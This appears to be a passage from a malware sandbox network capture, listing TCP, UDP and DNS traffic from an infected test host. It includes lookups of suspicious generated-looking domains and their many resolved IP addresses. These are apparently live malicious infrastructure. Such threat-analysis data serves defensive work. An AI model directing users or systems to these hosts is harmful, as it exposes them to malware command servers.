Jun 29, 2022 23:12:26.026990891 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.027028084 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:26.027056932 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:26.050050974 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.050822020 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.050841093 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.050858974 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.050879002 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.050896883 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.050918102 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.051032066 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:26.051124096 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:26.073153019 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.073205948 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.073235035 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.073262930 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.073345900 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.073436022 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:26.073486090 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.073499918 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:26.073622942 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.073649883 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.073677063 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.073775053 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.095904112 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.095952034 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.095978975 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.096004963 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.096587896 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.096618891 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.096646070 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.096673012 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.096699953 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.096728086 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.096752882 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.096780062 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.252633095 CEST	80	49817	175.119.10.231	192.168.2.3
Jun 29, 2022 23:12:26.629715919 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.629832029 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:27.169646025 CEST	80	49817	175.119.10.231	192.168.2.3
Jun 29, 2022 23:12:27.169668913 CEST	80	49817	175.119.10.231	192.168.2.3
Jun 29, 2022 23:12:27.169728994 CEST	49817	80	192.168.2.3	175.119.10.231
Jun 29, 2022 23:12:27.169801950 CEST	49817	80	192.168.2.3	175.119.10.231
Jun 29, 2022 23:12:27.249536037 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:27.297489882 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:27.374100924 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:27.399135113 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:27.399298906 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:27.493385077 CEST	80	49817	175.119.10.231	192.168.2.3
Jun 29, 2022 23:12:27.570489883 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:27.594522953 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:27.595279932 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:28.938519955 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:28.985220909 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:29.061444998 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:29.084443092 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:29.084579945 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:29.103467941 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:29.157042980 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:29.330461025 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:29.353445053 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:29.353595972 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:29.363126040 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:29.407090902 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:30.780519009 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:30.912414074 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:30.912581921 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:30.936537981 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:31.011560917 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:31.011718035 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:31.019382000 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:31.172879934 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:31.217529058 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:31.241473913 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:31.241561890 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:32.919475079 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:32.943567038 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:32.943711996 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:32.967617989 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:32.992547035 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:32.992718935 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:33.016598940 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:33.157555103 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:33.159388065 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:33.242561102 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:33.242712975 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:33.266551018 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:33.470010996 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:34.835546017 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:34.858731985 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:34.858895063 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:34.880896091 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:34.906016111 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:34.906160116 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:34.923898935 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:34.970102072 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:35.060636997 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:35.132776022 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:35.132956982 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:35.258057117 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:35.280653954 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:35.280832052 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:36.775544882 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:36.798574924 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:36.798779964 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:36.845520973 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:36.869596004 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:36.869803905 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:36.881508112 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:36.970244884 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:37.115875006 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:37.139729977 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:37.139873028 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:37.164158106 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:37.235853910 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:37.235945940 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:37.259584904 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:37.360863924 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:38.728579998 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:38.752578974 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:38.752712965 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:38.775609970 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:38.799489975 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:38.799599886 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:38.874660969 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:38.970434904 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:39.098535061 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:39.122581005 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:39.122710943 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:39.149025917 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:39.171473980 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:39.171571970 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:39.249558926 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:39.361078978 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:40.769591093 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:40.792679071 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:40.792862892 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:40.817569017 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:40.841630936 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:40.841799974 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:40.866430044 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:40.938554049 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:40.938771963 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:41.112550020 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:41.137469053 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:41.137643099 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:41.160672903 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:41.183543921 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:41.183679104 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:41.377496004 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:41.470623970 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:42.882661104 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:42.905689955 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:42.905829906 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:42.931344032 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:42.954638958 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:42.954751968 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:42.978557110 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:43.002585888 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:43.002744913 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:43.028995991 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:43.173918962 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:43.196583986 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:43.220613956 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:43.220793009 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:43.243576050 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:43.269577026 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:43.269750118 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:43.569530964 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:43.676928043 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:44.908596039 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:44.932600021 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:44.932774067 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:45.010704041 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:45.034733057 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:45.034951925 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:45.088690996 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:45.112566948 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:45.112694979 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:45.238570929 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:45.264518023 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:45.264638901 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:45.337584972 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:45.361588955 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:45.361700058 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:45.385624886 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:45.409641981 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:45.409816027 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:45.737765074 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:45.861673117 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:47.084362984 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:47.109572887 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:47.109721899 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:47.133682013 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:47.155026913 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:47.155147076 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:47.182904959 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:47.204127073 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:47.204272985 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:47.378925085 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:47.401679993 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:47.401837111 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:47.428690910 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:47.471131086 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:47.524853945 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:47.674297094 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:52.239725113 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:52.362176895 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:58.215739965 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:58.362776995 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:13:08.029663086 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:13:08.169337034 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:13:23.803210974 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:13:23.874150991 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:13:46.762365103 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:14:02.509988070 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:14:02.577728987 CEST	49783	80	192.168.2.3	195.158.3.162

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 29, 2022 23:11:06.351576090 CEST	49873	53	192.168.2.3	8.8.8.8
Jun 29, 2022 23:11:06.652657986 CEST	53	49873	8.8.8.8	192.168.2.3
Jun 29, 2022 23:11:18.289376974 CEST	53802	53	192.168.2.3	8.8.8.8
Jun 29, 2022 23:11:18.321726084 CEST	53	53802	8.8.8.8	192.168.2.3
Jun 29, 2022 23:11:18.351636887 CEST	65266	53	192.168.2.3	8.8.8.8
Jun 29, 2022 23:11:18.458726883 CEST	53	65266	8.8.8.8	192.168.2.3
Jun 29, 2022 23:11:18.483413935 CEST	63332	53	192.168.2.3	8.8.8.8
Jun 29, 2022 23:11:18.592005014 CEST	53	63332	8.8.8.8	192.168.2.3
Jun 29, 2022 23:11:18.611272097 CEST	63548	53	192.168.2.3	8.8.8.8
Jun 29, 2022 23:11:18.645222902 CEST	53	63548	8.8.8.8	192.168.2.3
Jun 29, 2022 23:11:18.659482956 CEST	49327	53	192.168.2.3	8.8.8.8
Jun 29, 2022 23:11:18.687488079 CEST	53	49327	8.8.8.8	192.168.2.3
Jun 29, 2022 23:11:18.696551085 CEST	51391	53	192.168.2.3	8.8.8.8
Jun 29, 2022 23:11:19.209013939 CEST	53	51391	8.8.8.8	192.168.2.3
Jun 29, 2022 23:11:45.538100958 CEST	61380	53	192.168.2.3	8.8.8.8
Jun 29, 2022 23:11:45.979594946 CEST	53	61380	8.8.8.8	192.168.2.3
Jun 29, 2022 23:11:47.369369984 CEST	63146	53	192.168.2.3	8.8.8.8
Jun 29, 2022 23:11:47.935431004 CEST	53	63146	8.8.8.8	192.168.2.3
Jun 29, 2022 23:11:50.798264027 CEST	52985	53	192.168.2.3	8.8.8.8
Jun 29, 2022 23:11:50.814934015 CEST	53	52985	8.8.8.8	192.168.2.3
Jun 29, 2022 23:11:51.913456917 CEST	58625	53	192.168.2.3	8.8.8.8
Jun 29, 2022 23:11:51.932615995 CEST	53	58625	8.8.8.8	192.168.2.3
Jun 29, 2022 23:11:55.141252041 CEST	52810	53	192.168.2.3	8.8.8.8
Jun 29, 2022 23:11:55.160443068 CEST	53	52810	8.8.8.8	192.168.2.3
Jun 29, 2022 23:11:58.488260984 CEST	55151	53	192.168.2.3	8.8.8.8
Jun 29, 2022 23:11:58.506696939 CEST	53	55151	8.8.8.8	192.168.2.3
Jun 29, 2022 23:12:04.649038076 CEST	59390	53	192.168.2.3	8.8.8.8
Jun 29, 2022 23:12:04.666182995 CEST	53	59390	8.8.8.8	192.168.2.3
Jun 29, 2022 23:12:05.779839039 CEST	64816	53	192.168.2.3	8.8.8.8
Jun 29, 2022 23:12:06.344942093 CEST	53	64816	8.8.8.8	192.168.2.3
Jun 29, 2022 23:12:14.628091097 CEST	51518	53	192.168.2.3	8.8.8.8
Jun 29, 2022 23:12:15.069782019 CEST	53	51518	8.8.8.8	192.168.2.3
Jun 29, 2022 23:12:16.542318106 CEST	52581	53	192.168.2.3	8.8.8.8
Jun 29, 2022 23:12:16.562060118 CEST	53	52581	8.8.8.8	192.168.2.3
Jun 29, 2022 23:12:19.423160076 CEST	62724	53	192.168.2.3	8.8.8.8
Jun 29, 2022 23:12:19.442878962 CEST	53	62724	8.8.8.8	192.168.2.3
Jun 29, 2022 23:12:25.244672060 CEST	62756	53	192.168.2.3	8.8.8.8
Jun 29, 2022 23:12:25.596867085 CEST	53	62756	8.8.8.8	192.168.2.3
Jun 29, 2022 23:12:27.183476925 CEST	58561	53	192.168.2.3	8.8.8.8
Jun 29, 2022 23:12:27.436638117 CEST	53	58561	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 29, 2022 23:11:06.351576090 CEST	192.168.2.3	8.8.8.8	0x9987	Standard query (0)	monsutiur4.com	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:18.289376974 CEST	192.168.2.3	8.8.8.8	0x3ee	Standard query (0)	nusurionuy5ff.at	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:18.351636887 CEST	192.168.2.3	8.8.8.8	0xd59e	Standard query (0)	moroitomo4.net	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:18.483413935 CEST	192.168.2.3	8.8.8.8	0x93a1	Standard query (0)	susuerulianita1.net	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:18.611272097 CEST	192.168.2.3	8.8.8.8	0x5bfe	Standard query (0)	cucumbetuturel4.com	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:18.659482956 CEST	192.168.2.3	8.8.8.8	0x5c95	Standard query (0)	nunuslushau.com	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:18.696551085 CEST	192.168.2.3	8.8.8.8	0x151e	Standard query (0)	linislominyt11.at	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:45.538100958 CEST	192.168.2.3	8.8.8.8	0xdcee	Standard query (0)	linislominyt11.at	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:47.369369984 CEST	192.168.2.3	8.8.8.8	0xca73	Standard query (0)	linislominyt11.at	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:50.798264027 CEST	192.168.2.3	8.8.8.8	0x6ffb	Standard query (0)	linislominyt11.at	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:51.913456917 CEST	192.168.2.3	8.8.8.8	0x90b6	Standard query (0)	amarillavida.com	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:55.141252041 CEST	192.168.2.3	8.8.8.8	0x3a70	Standard query (0)	linislominyt11.at	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:58.488260984 CEST	192.168.2.3	8.8.8.8	0xd029	Standard query (0)	linislominyt11.at	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:04.649038076 CEST	192.168.2.3	8.8.8.8	0x2bdf	Standard query (0)	linislominyt11.at	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:05.779839039 CEST	192.168.2.3	8.8.8.8	0xfff1	Standard query (0)	linislominyt11.at	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:14.628091097 CEST	192.168.2.3	8.8.8.8	0x5057	Standard query (0)	linislominyt11.at	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:16.542318106 CEST	192.168.2.3	8.8.8.8	0x9413	Standard query (0)	linislominyt11.at	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:19.423160076 CEST	192.168.2.3	8.8.8.8	0x3488	Standard query (0)	t.me	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:25.244672060 CEST	192.168.2.3	8.8.8.8	0x74a3	Standard query (0)	diewebseite.at	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:27.183476925 CEST	192.168.2.3	8.8.8.8	0xdcf1	Standard query (0)	diewebseite.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 29, 2022 23:11:06.652657986 CEST	8.8.8.8	192.168.2.3	0x9987	No error (0)	monsutiur4.com		185.237.206.60	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:18.321726084 CEST	8.8.8.8	192.168.2.3	0x3ee	Name error (3)	nusurionuy5ff.at	none	none	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:18.458726883 CEST	8.8.8.8	192.168.2.3	0xd59e	Name error (3)	moroitomo4.net	none	none	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:18.592005014 CEST	8.8.8.8	192.168.2.3	0x93a1	Name error (3)	susuerulianita1.net	none	none	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:18.645222902 CEST	8.8.8.8	192.168.2.3	0x5bfe	Name error (3)	cucumbetuturel4.com	none	none	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:18.687488079 CEST	8.8.8.8	192.168.2.3	0x5c95	Name error (3)	nunuslushau.com	none	none	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:19.209013939 CEST	8.8.8.8	192.168.2.3	0x151e	No error (0)	linislominyt11.at		195.158.3.162	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:19.209013939 CEST	8.8.8.8	192.168.2.3	0x151e	No error (0)	linislominyt11.at		196.200.111.5	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:19.209013939 CEST	8.8.8.8	192.168.2.3	0x151e	No error (0)	linislominyt11.at		190.117.75.91	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:19.209013939 CEST	8.8.8.8	192.168.2.3	0x151e	No error (0)	linislominyt11.at		188.48.69.64	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:19.209013939 CEST	8.8.8.8	192.168.2.3	0x151e	No error (0)	linislominyt11.at		175.119.10.231	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:19.209013939 CEST	8.8.8.8	192.168.2.3	0x151e	No error (0)	linislominyt11.at		222.232.238.243	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:19.209013939 CEST	8.8.8.8	192.168.2.3	0x151e	No error (0)	linislominyt11.at		1.248.122.240	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:19.209013939 CEST	8.8.8.8	192.168.2.3	0x151e	No error (0)	linislominyt11.at		148.255.22.31	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:19.209013939 CEST	8.8.8.8	192.168.2.3	0x151e	No error (0)	linislominyt11.at		37.34.248.24	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:19.209013939 CEST	8.8.8.8	192.168.2.3	0x151e	No error (0)	linislominyt11.at		211.53.230.67	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:45.979594946 CEST	8.8.8.8	192.168.2.3	0xdcee	No error (0)	linislominyt11.at		211.53.230.67	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:45.979594946 CEST	8.8.8.8	192.168.2.3	0xdcee	No error (0)	linislominyt11.at		195.158.3.162	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:45.979594946 CEST	8.8.8.8	192.168.2.3	0xdcee	No error (0)	linislominyt11.at		196.200.111.5	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:45.979594946 CEST	8.8.8.8	192.168.2.3	0xdcee	No error (0)	linislominyt11.at		190.117.75.91	A (IP address)	IN (0x0001)
